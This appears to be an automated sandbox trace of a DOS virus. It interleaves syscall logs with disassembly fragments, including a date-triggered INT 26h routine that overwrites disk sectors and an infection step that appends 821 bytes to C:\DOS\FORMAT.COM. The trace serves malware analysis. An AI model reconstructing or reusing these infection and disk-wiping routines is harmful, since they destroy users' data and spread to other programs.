0x131dd: jb 0x13223
0x131df: mov cx, ax
0x131e1: sub ax, 3
0x131e4: mov word ptr [si + 0x6c], ax
0x131e8: add cx, 0x34d
0x131ec: mov di, si
0x131ee: sub di, 0x24b
2018-12-25T11:58:58.986401489Z 63 PC: 131cb | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:58:58.993715265Z 66 PC: 131dd | Move file pointer
2018-12-25T11:58:58.9957018Z 64 PC: 13202 | Write file or device (Write 821 bytes on handle 5)
2018-12-25T11:58:59.005227578Z 66 PC: 13214 | Move file pointer
2018-12-25T11:58:59.008150163Z 64 PC: 13223 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:58:59.011349148Z 87 PC: 13236 | Get or set file date and time
2018-12-25T11:58:59.01305089Z 62 PC: 1323a | Close file
2018-12-25T11:58:59.021338562Z 67 PC: 13249 | Get or set file attributes
2018-12-25T11:58:59.037071555Z 26 PC: 13256 | Set disk transfer address
2018-12-25T11:58:59.038925333Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-25T11:58:59.041703304Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.046540715Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.049429176Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.052319267Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.058720273Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.061234254Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.0636258Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.070881257Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.080391612Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.084097666Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.088598774Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.093236002Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.097773395Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.101433761Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.104407256Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.107122133Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.111058811Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.113808733Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.116540427Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.119479287Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.123016414Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.127165486Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.129930143Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.133550569Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.136324583Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.139157759Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.142974671Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.145744811Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.148383587Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.152876883Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.155651062Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.158939247Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.161924104Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.164469673Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.166853687Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.169397543Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.172303313Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.174854578Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.177497737Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.18098162Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.185333258Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.188080503Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.191684898Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.194323733Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.196961426Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.200348372Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.203244132Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.2061082Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.209584188Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.212116755Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.214345797Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.218783893Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.221253755Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.223834681Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.226299973Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.229877671Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.232361074Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.234600133Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.238163914Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.240315936Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.243377499Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.256501555Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.259158027Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.2618399Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.266155031Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.26899725Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.271847106Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.275684453Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.280184093Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.282628823Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.285243375Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.288238306Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.29108422Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.294642001Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.297451516Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.30005958Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.30261751Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.305758043Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.309881795Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.312474698Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.316250846Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.31986674Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.322407624Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.325722211Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.327371351Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.329720757Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.332511731Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.334923031Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.337270458Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.340408353Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.342750898Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.344966021Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.348834397Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.352491897Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.355128451Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.358183166Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.360606132Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.364957231Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.367800162Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.370393006Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.372594519Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.374811162Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.378286446Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.380951541Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.38445242Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.387889509Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.390529583Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.393775235Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.397889428Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.400355517Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.402735524Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.40561215Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.408260956Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.410656846Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.413376548Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.41558009Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.417775536Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.420751423Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.422996115Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.425594379Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.428502051Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.43104771Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.433282442Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.436618025Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.438934528Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.441123512Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.443598956Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.445811238Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.447819545Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.450279545Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.452748887Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.454714041Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.457359157Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.460160377Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.462393423Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.467266385Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.468924882Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.471028421Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.472891941Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.475222745Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.477440625Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.487565871Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.491252598Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.493394837Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.495988238Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.498477387Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.500777223Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.503054503Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.506982122Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.510898327Z 61 PC: 12a69 | Open file (Filename = 'A:\TEST.EXE')
2018-12-25T11:58:59.521733778Z 63 PC: 12a69 | Read file or device (See above)
2018-12-25T11:58:59.54732076Z 62 PC: 12a69 | Close file (See above)
2018-12-25T11:58:59.553989141Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.558643055Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.561975782Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.566391237Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.570215599Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.574144716Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.577448616Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.581325518Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.586712418Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.5897474Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.594942474Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.597737741Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.600405693Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.604293468Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.607397694Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.61028742Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.61350101Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.617245074Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.619964919Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.623483971Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.627240526Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.629930676Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.632634968Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.636459387Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.639171581Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.643517432Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.646198711Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.65000812Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.6522542Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.655526875Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.657796423Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.659953398Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.662683785Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.666943924Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.67631579Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.68463229Z 9 PC: 12b93 | Display string (String= 'This file has not had the INJECT.EXE run on it to load the Virus name into it ')
2018-12-25T11:58:59.690862032Z 76 PC: 12a69 | Terminate with return code (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6255,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:58:58.579998559Z 255 PC: 13036 | UNKNOWN!
2018-12-25T11:58:58.581720698Z 42 PC: 13042 | Get date 0x13042: cmp cx, 0x7c7
0x13046: jb 0x13061
0x13048: jge 0x1304d
0x1304a: jmp 0x130a7
0x1304c: nop
0x1304d: mov ah, 0x2a
0x1304f: int 0x21
0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
2018-12-25T11:58:58.584023105Z 43 PC: 1306e | Set date
2018-12-25T11:58:58.587349762Z 45 PC: 13074 | Set time
2018-12-25T11:58:58.591004263Z 44 PC: 13078 | Get time 0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
0x1307d: jmp 0x1304d
0x1307f: mov ah, 9
0x13081: mov dx, si
0x13083: add dx, 0x40
0x13087: int 0x21
0x13089: cmp byte ptr [si], 0x1a
0x1308e: ja 0x130a7
0x13090: pushf
0x13091: mov al, byte ptr [si]
0x13095: mov cx, 0x100
0x13098: mov dx, 0
0x1309b: mov bx, 1
0x1309e: int 0x26
0x130a0: popf
0x130a1: inc byte ptr [si]
0x130a5: jmp 0x13089
0x130a7: push es
0x130a8: mov ah, 0x2f
2018-12-25T11:58:58.593377957Z 42 PC: 13051 | Get date 0x13051: cmp dh, 6
0x13054: jge 0x13059
0x13056: jmp 0x130a7
0x13058: nop
0x13059: cmp dl, 0x16
0x1305c: jge 0x1307f
0x1305e: jmp 0x130a7
0x13060: nop
0x13061: cmp cx, 0x7c6
0x13065: je 0x13074
0x13067: mov ah, 0x2b
0x13069: mov cx, 0x7c6
0x1306c: int 0x21
0x1306e: mov ah, 0x2d
0x13070: mov cl, 1
0x13072: int 0x21
0x13074: mov ah, 0x2c
0x13076: int 0x21
0x13078: cmp cl, 0xf
0x1307b: jae 0x13089
2018-12-25T11:58:58.595456091Z 47 PC: 130ac | Get disk transfer address
2018-12-25T11:58:58.596682322Z 26 PC: 130bf | Set disk transfer address
2018-12-25T11:58:58.600112062Z 78 PC: 1314a | Find first file
2018-12-25T11:58:58.611003057Z 79 PC: 13150 | Find next file
2018-12-25T11:58:58.613311787Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.615857372Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.618209141Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.62052541Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.623239443Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.625565228Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.628495353Z 78 PC: 1314a | Find first file (See above)
2018-12-25T11:58:58.637581987Z 79 PC: 13150 | Find next file (See above)
2018-12-25T11:58:58.640449459Z 67 PC: 13189 | Get or set file attributes
2018-12-25T11:58:58.646098472Z 67 PC: 1319b | Get or set file attributes
2018-12-25T11:58:59.421476167Z 61 PC: 131a6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:58:59.428905152Z 87 PC: 131b2 | Get or set file date and time
2018-12-25T11:58:59.430427561Z 44 PC: 131be | Get time 0x131be: mov ah, 0x3f
0x131c0: mov cx, 3
0x131c3: mov dx, 0x68
0x131c6: nop
0x131c7: add dx, si
0x131c9: int 0x21
0x131cb: jb 0x13223
0x131cd: cmp ax, 3
0x131d0: jne 0x13223
0x131d2: mov ax, 0x4202
0x131d5: mov cx, 0
0x131d8: mov dx, 0
0x131db: int 0x21
0x131dd: jb 0x13223
0x131df: mov cx, ax
0x131e1: sub ax, 3
0x131e4: mov word ptr [si + 0x6c], ax
0x131e8: add cx, 0x34d
0x131ec: mov di, si
0x131ee: sub di, 0x24b
2018-12-25T11:58:59.433220101Z 63 PC: 131cb | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:58:59.438471885Z 66 PC: 131dd | Move file pointer
2018-12-25T11:58:59.439784803Z 64 PC: 13202 | Write file or device (Write 821 bytes on handle 5)
2018-12-25T11:58:59.540761715Z 66 PC: 13214 | Move file pointer
2018-12-25T11:58:59.542665928Z 64 PC: 13223 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:58:59.545492902Z 87 PC: 13236 | Get or set file date and time
2018-12-25T11:58:59.54827296Z 62 PC: 1323a | Close file
2018-12-25T11:58:59.555329853Z 67 PC: 13249 | Get or set file attributes
2018-12-25T11:58:59.565538775Z 26 PC: 13256 | Set disk transfer address
2018-12-25T11:58:59.568484291Z 2 PC: 12bae | Character output (Char = '0d')
2018-12-25T11:58:59.570970367Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.574880654Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.578534113Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.580934264Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.583348066Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.585968879Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.589189326Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.591558408Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.593925108Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.597303783Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.599640257Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.601984754Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.605103614Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.607782872Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.610800993Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.61382193Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.616450535Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.619249067Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.621749323Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.624255559Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.626351626Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.629693076Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.632421479Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.635437761Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.638209528Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.641754354Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.643946964Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.646066851Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.649488884Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.652278722Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.654622053Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.657681814Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.659937729Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.662052395Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.66502973Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.667249881Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.66925831Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.672178873Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.674751519Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.677064878Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.681883628Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.684110165Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.687249929Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.691415173Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.694052826Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.69643033Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.699474879Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.702587344Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.704982322Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.70756392Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.710752753Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.713069148Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.715803665Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.719653778Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.721984326Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.724819133Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.72819353Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.731963328Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.748473375Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.75153376Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.753721055Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.756082518Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.759849661Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.770847998Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.772921222Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.775756153Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.778388363Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.780753071Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.783939472Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.786205856Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.788563999Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.791726301Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.79445598Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.796794277Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.799891624Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.802444602Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.804775896Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.807815542Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.811397978Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.813749737Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.81685364Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.819872517Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.8222149Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.825437145Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.827752433Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.829781704Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.832317731Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.835746648Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.837768392Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.839992307Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.842916501Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.845204625Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.847514692Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.85039964Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.852462825Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.854719658Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.857929293Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.861763271Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.864233271Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.870616681Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.872983841Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.875341246Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.87814379Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.880198987Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.882411376Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.885249208Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.887563452Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.889905876Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.892751143Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.894963582Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.89696942Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.900363471Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.902691838Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.905039017Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.908461703Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.910809453Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.913155462Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.917080449Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.919800583Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.922141727Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.925473018Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.928165272Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.930518274Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.93364757Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.936344009Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.938858649Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.941071093Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.943770514Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.945888573Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.948776246Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.950904343Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.953229964Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.95620113Z 2 PC: 12bae | Character output (See above)
